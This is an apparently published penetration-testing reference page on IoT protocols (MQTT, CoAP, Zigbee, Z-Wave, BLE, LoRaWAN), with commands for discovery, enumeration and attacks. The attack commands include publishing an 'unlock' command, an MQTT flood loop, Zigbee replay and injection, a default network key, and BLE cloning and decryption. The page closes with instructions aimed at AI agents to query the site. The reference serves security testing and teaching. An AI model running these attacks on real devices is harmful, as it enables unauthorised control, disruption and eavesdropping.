# IoT Protocols

Security testing for IoT communication protocols - MQTT, CoAP, Zigbee, Z-Wave, BLE, and LoRaWAN.

> **Skill Level**: Advanced\
> **Prerequisites**: Networking, RF basics, embedded systems

## MQTT (Message Queuing Telemetry Transport)

### Overview

```
- Port: 1883 (plain), 8883 (TLS)
- Publish/Subscribe model
- Used in: Smart home, ICS/SCADA, sensors
- Broker-based architecture
```

### Discovery

```bash
# Scan for MQTT brokers
nmap -p 1883,8883 --script mqtt-subscribe target.com

# Shodan
shodan search "port:1883 mqtt"

# Check for anonymous access
mosquitto_sub -h target.com -t '#' -v

# Expected output (if vulnerable):
# home/sensors/temperature 23.5
# home/door/status locked
# devices/camera/feed [binary data]
```

### Enumeration

```bash
# Subscribe to all topics (wildcard)
mosquitto_sub -h target.com -t '#' -v

# Subscribe to specific level
mosquitto_sub -h target.com -t '+/+/status' -v

# With credentials (if known)
mosquitto_sub -h target.com -u admin -P password -t '#' -v

# List topics via $SYS
mosquitto_sub -h target.com -t '$SYS/#' -v
```

### Attacks

```bash
# Publish malicious message
mosquitto_pub -h target.com -t 'home/door/command' -m 'unlock'

# Denial of Service (flood)
while true; do mosquitto_pub -h target.com -t 'test' -m 'flood'; done

# Intercept and modify (MITM)
# Use mitmproxy or custom broker
```

### Tools

```bash
# MQTT Explorer (GUI)
https://mqtt-explorer.com/

# mqtt-pwn
https://github.com/akamai-threat-research/mqtt-pwn
python mqtt_pwn.py -b target.com -p 1883

# MQTT-CLI
mqtt sub -h target.com -t '#'
```

## CoAP (Constrained Application Protocol)

### Overview

```
- Port: 5683 (UDP), 5684 (DTLS)
- REST-like for constrained devices
- Used in: Sensors, smart meters, M2M
```

### Discovery

```bash
# Scan for CoAP
nmap -sU -p 5683,5684 target.com

# Shodan
shodan search "port:5683"
```

### Enumeration

```bash
# CoAP client
pip install aiocoap

# Discover resources
coap-client -m get coap://target.com/.well-known/core

# Expected output:
# </sensors>;rt="temperature",</actuators>;rt="switch"

# Get resource
coap-client -m get coap://target.com/sensors/temp
```

### Attacks

```bash
# Modify resource (if writable)
coap-client -m put coap://target.com/actuators/switch -e "on"

# Amplification attack (DDoS)
# CoAP can be used for amplification due to UDP
```

## Zigbee

### Overview

```
- Frequency: 2.4 GHz (worldwide), 868 MHz (EU), 915 MHz (US)
- Range: 10-100m
- Used in: Smart home, lighting, sensors
- Network types: Star, Tree, Mesh
```

### Hardware Requirements

```
- CC2531 USB dongle ($10-15)
- HackRF One
- YARD Stick One
- Ubertooth (can sniff 2.4 GHz)
```

### Sniffing

```bash
# With Wireshark + CC2531
# Flash CC2531 with sniffer firmware

# Using KillerBee
killerbee zbstumbler  # Find networks
killerbee zbdump -c 11 -w capture.pcap  # Capture channel 11

# Using Zigbee2MQTT (for analysis)
```

### Attacks

```bash
# KillerBee toolkit
# https://github.com/riverloopsec/killerbee

# Replay attack
zbdump -c 11 -w capture.pcap
zbreplay -c 11 -r capture.pcap

# Key extraction (if default key)
# Default Trust Center Link Key: 5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39

# Inject packets
zbgoodfind -c 11 -f capture.pcap  # Find key
zbinject -c 11 -p [packet]  # Inject
```

### Security Issues

```
- Default/weak link keys
- No replay protection (some implementations)
- Insecure rejoin process
- OTA update vulnerabilities
```

## Z-Wave

### Overview

```
- Frequency: 908.42 MHz (US), 868.42 MHz (EU)
- Range: 30-100m
- Used in: Smart locks, thermostats, sensors
- Proprietary but reverse-engineered
```

### Hardware

```
- Z-Wave.Me UZB stick
- RTL-SDR (limited)
- HackRF One
```

### Attacks

```bash
# Z-Wave uses S0, S1, S2 security
# S0 has known vulnerabilities (key exchange flaw)

# EZ-Wave tool
# https://github.com/cureHsu/EZ-Wave
python ez-wave.py --interface /dev/ttyACM0

# Scapy-radio
# https://github.com/BastilleResearch/scapy-radio
```

### S0 Key Extraction

```
1. Force device into inclusion mode
2. Sniff inclusion process
3. S0 key is XORed with known constant
4. Derive network key
```

## BLE (Bluetooth Low Energy)

### Overview

```
- Frequency: 2.4 GHz
- Range: ~100m
- Used in: Fitness trackers, locks, beacons
```

### Scanning

```bash
# hcitool (deprecated but functional)
hcitool lescan

# Expected output:
# AA:BB:CC:DD:EE:FF Device Name
# 11:22:33:44:55:66 (unknown)

# bluetoothctl
bluetoothctl
[bluetooth]# scan on

# bettercap
bettercap -eval "ble.recon on"
```

### Enumeration

```bash
# Connect and enumerate services
gatttool -b AA:BB:CC:DD:EE:FF -I
[AA:BB:CC:DD:EE:FF][LE]> connect
[AA:BB:CC:DD:EE:FF][LE]> primary
# Lists services

[AA:BB:CC:DD:EE:FF][LE]> characteristics
# Lists characteristics

[AA:BB:CC:DD:EE:FF][LE]> char-read-hnd 0x0016
# Read characteristic value
```

### Attacks

```bash
# GATT attacks with gattacker
# https://github.com/securing/gattacker
node scan.js
node advertise.js -a config.json  # Clone device

# BLE spoofing with bettercap
bettercap
ble.recon on
ble.enum AA:BB:CC:DD:EE:FF
ble.write AA:BB:CC:DD:EE:FF 0x0016 01  # Write to characteristic

# Crackle - Crack BLE encryption
# https://github.com/mikeryan/crackle
crackle -i capture.pcap -o decrypted.pcap
```

### Common Vulnerabilities

```
- Static/weak pairing keys
- Lack of encryption
- MITM during pairing
- Replay attacks
- Unauthorized characteristic access
```

## LoRaWAN

### Overview

```
- Frequency: 868 MHz (EU), 915 MHz (US), 433 MHz (Asia)
- Range: 2-15 km
- Used in: Smart cities, agriculture, utilities
```

### Hardware

```
- RTL-SDR + LoRa receiver
- HackRF One
- Dedicated LoRa gateway
```

### Security Architecture

```
- AppKey: Application key (shared secret)
- NwkSKey: Network session key
- AppSKey: Application session key
- DevAddr: Device address

Encryption: AES-128
```

### Attacks

```bash
# LoRa traffic analysis
# https://github.com/rpp0/gr-lora

# Replay attacks (if no frame counter)
# ACK spoofing
# Bit-flipping attacks (if no integrity check)

# Join request replay
# If DevNonce not checked, can replay join requests
```

## General IoT Testing Tools

```bash
# Firmware analysis
binwalk -e firmware.bin
firmware-mod-kit

# Protocol analysis
Wireshark + dissectors
scapy (custom protocol parsing)

# Radio
GNU Radio
Universal Radio Hacker (URH)
SDR# / GQRX
```

## Related Topics

* [Wireless Testing](/others/wireless.md) - WiFi, general wireless
* [Hardware Hacking](/others/hardware.md) - Physical device testing
* [Network Scanning](/recon/network-scanning.md) - Network discovery


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/others/iot-protocols.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.